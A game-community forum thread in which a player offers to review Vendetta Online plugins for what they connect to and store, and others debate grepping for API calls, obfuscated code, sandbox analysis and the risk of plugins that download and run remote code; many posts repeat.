Forums » Community Projects
Can I Trust That Plugin?
Over the next few weeks I will attempt to review and make transparent what each and every plugin does, connects to, and stores about you (and others). Of course the final decision is up to you (of course) whether to use the plugins.
NOTE: The files may be changed by the authors over time, use the local links at the bottom of every review for the actual file I reviewed.
The List (in alphabetical order)
-- Catalog (Version 1.4) (author: Pizzasgood)
-- TargetLess/TouchLess (Version 1.7.15) (author: drazed/slime of [Itan])
-- TGFT_Utilities (Version 1.87/1.88, V1.85) (author: Lisa201 of [TGFT])
To do:
CaptainsKit
cargolist
ChatTimestamp
collectorwatch
customHUD
DKAutofill
kill_notify
MAID
MultiAim
Quickhail
QuickJump
reporter
TargetTools
tcs-plugins
TradeAssistant
turrethop
wg
If there are any other plugins they would like me to check out, please leave a reply in this thread and I'll try to have it done within 48 hours.
NOTE: The files may be changed by the authors over time, use the local links at the bottom of every review for the actual file I reviewed.
The List (in alphabetical order)
-- Catalog (Version 1.4) (author: Pizzasgood)
-- TargetLess/TouchLess (Version 1.7.15) (author: drazed/slime of [Itan])
-- TGFT_Utilities (Version 1.87/1.88, V1.85) (author: Lisa201 of [TGFT])
To do:
CaptainsKit
cargolist
ChatTimestamp
collectorwatch
customHUD
DKAutofill
kill_notify
MAID
MultiAim
Quickhail
QuickJump
reporter
TargetTools
tcs-plugins
TradeAssistant
turrethop
wg
If there are any other plugins they would like me to check out, please leave a reply in this thread and I'll try to have it done within 48 hours.
TGFT_util. is a NO on my rating
Catalog, just like Trade Assistant, but it's great
Catalog, just like Trade Assistant, but it's great
Instead of being retarded and scanning manually just publish a list of API functions to search for in a plugin and compare the functionality that the plugin is supposed to contain with the functionality of the key functions it has in the code.
Its going to stick out like a sore thumb if for instance if FlamboyanceHUD uses the givemoney function, why would it need to give me all your money if it finds /me honks in chat?
Plugins like Anyx that actually download code to be executed should be flagged 'do not use'. There is no way to know what the author is going to execute on your game client.
Its going to stick out like a sore thumb if for instance if FlamboyanceHUD uses the givemoney function, why would it need to give me all your money if it finds /me honks in chat?
Plugins like Anyx that actually download code to be executed should be flagged 'do not use'. There is no way to know what the author is going to execute on your game client.
There's nothing retarded about auditing code manually.
I could implement the example you gave without the words "givemoney", "TheRedSpy" or "honks" being caught by a search.
I could implement the example you gave without the words "givemoney", "TheRedSpy" or "honks" being caught by a search.
Correct, but you can't implement the example without using the API functions that give money or read text or the GKInterface() command referencing 'givemoney'. Which could all be flagged automatically.
Good idea! You may want to add the date you reviewed the plugin too, to further help with knowing what version/state the plugin was in when you looked at it
Sure I can. I'm surprised you've never heard of obfuscated code, TRS.
...especially since of the guys who helped write the game had a thing for it...
...especially since of the guys who helped write the game had a thing for it...
I sort of have, but I don't have a formal education in computer science remember, my formal education is in law which basically means I was formally instructed in how society ran 10 years ago with a view to continuing to run it this way today.
So I'm assuming that's where you write code that writes code.
You're never going to design a system that automatically reviews and guarantees safe code, but you can easily design one that clears it for most things.
To be honest you're making persuasive arguments that the plugin interface for vendetta is too permissive. There's too much fun to be had to make it more restrictive.
If you manually audit the code you're not going to find code obfuscations either though. So even if Kierky goes to all the effort to review it, he might have to say something like "I have no fucking idea what this group of functions does and I couldn't tell what it did when I executed it".
Makes it too complicated to control then you have to have all these stupid discussions about trusting your source.
Might as well just rule out as unsafe all plugins which are written cryptically. Which is where you can just look at the source code to ensure nothing is written poorly, run the automatic analysis and generate the list of functionality that a plugin uses and post that.
It gets to the point where maybe VO should have an actual plugin analyser tool that executes the code in its own little sandbox and outputs what functions it's going to execute. Couldn't you write just a normal lua application to execute the code and print that out? Therefore you'd know what the code did without ever having to execute it in the game client.
So I'm assuming that's where you write code that writes code.
You're never going to design a system that automatically reviews and guarantees safe code, but you can easily design one that clears it for most things.
To be honest you're making persuasive arguments that the plugin interface for vendetta is too permissive. There's too much fun to be had to make it more restrictive.
If you manually audit the code you're not going to find code obfuscations either though. So even if Kierky goes to all the effort to review it, he might have to say something like "I have no fucking idea what this group of functions does and I couldn't tell what it did when I executed it".
Makes it too complicated to control then you have to have all these stupid discussions about trusting your source.
Might as well just rule out as unsafe all plugins which are written cryptically. Which is where you can just look at the source code to ensure nothing is written poorly, run the automatic analysis and generate the list of functionality that a plugin uses and post that.
It gets to the point where maybe VO should have an actual plugin analyser tool that executes the code in its own little sandbox and outputs what functions it's going to execute. Couldn't you write just a normal lua application to execute the code and print that out? Therefore you'd know what the code did without ever having to execute it in the game client.
Execution can be conditional. There would be no way to ensure that all functionality got tested.
But yeah, I do agree that you could easily identify most things with some simple grepping and just be very paranoid about anything that looks strange after a visual inspection, and you'd then be relatively secure. But not everybody is willing to put in that effort (or knows enough to do the visual inspection in the first place), so having third parties vouch for plugins is still a useful thing. Obviously to rely on that means you're trusting the third party to be honest and competent, but their vouchsafe still increases the odds that the plugin is actually safe compared to the odds if you only trust the plugin author.
My point is that just like with any other aspect of security, there is no one-size-fits-all solution. Everybody has a different perception of risk and a different level of risk-aversion. Some people install security systems in their houses and get big dogs as backup/deterrence. Nuclear facilities have multifactor authentication along with guards and numerous overlapping security systems. I have a baseball bat.
But yeah, I do agree that you could easily identify most things with some simple grepping and just be very paranoid about anything that looks strange after a visual inspection, and you'd then be relatively secure. But not everybody is willing to put in that effort (or knows enough to do the visual inspection in the first place), so having third parties vouch for plugins is still a useful thing. Obviously to rely on that means you're trusting the third party to be honest and competent, but their vouchsafe still increases the odds that the plugin is actually safe compared to the odds if you only trust the plugin author.
My point is that just like with any other aspect of security, there is no one-size-fits-all solution. Everybody has a different perception of risk and a different level of risk-aversion. Some people install security systems in their houses and get big dogs as backup/deterrence. Nuclear facilities have multifactor authentication along with guards and numerous overlapping security systems. I have a baseball bat.
Since I do have a formal education in Computer Science... as well as
basic
googling
a small correction; obfuscated code is simply code that is written to be unreadable (thanks for the perfect example ARF, the ol Garbage Truck). If you were clever & patient enough you'd be able to work out what it did eventually.
But TRS, what you're talking about is a different & legitimate concern; code downloaded & executed on the fly ("code that writes [& executes] code"). There is simply no way to know what that can do, but Kierky can (and maybe already has?) designate which plugins do this, leaving it as a red flag for players to decide on a case-by-case basis depending on how much they trust the author.
basic
googling
a small correction; obfuscated code is simply code that is written to be unreadable (thanks for the perfect example ARF, the ol Garbage Truck). If you were clever & patient enough you'd be able to work out what it did eventually.
But TRS, what you're talking about is a different & legitimate concern; code downloaded & executed on the fly ("code that writes [& executes] code"). There is simply no way to know what that can do, but Kierky can (and maybe already has?) designate which plugins do this, leaving it as a red flag for players to decide on a case-by-case basis depending on how much they trust the author.
Can I trust that plugin? The answer is NO.
You could vet all of them today, and they could be bad tomorrow. For example: TCS can cause a memory leak in it's makefriends part, that causes clients to crash.
I use it, but that is my choice. And it's the choice of a new generation.
People will really have to use their own judgement when installing 3rd party stuff.
You could vet all of them today, and they could be bad tomorrow. For example: TCS can cause a memory leak in it's makefriends part, that causes clients to crash.
I use it, but that is my choice. And it's the choice of a new generation.
People will really have to use their own judgement when installing 3rd party stuff.
That's why at the bottom of every review, I provide a copy that I reviewed. Hosted on my own site.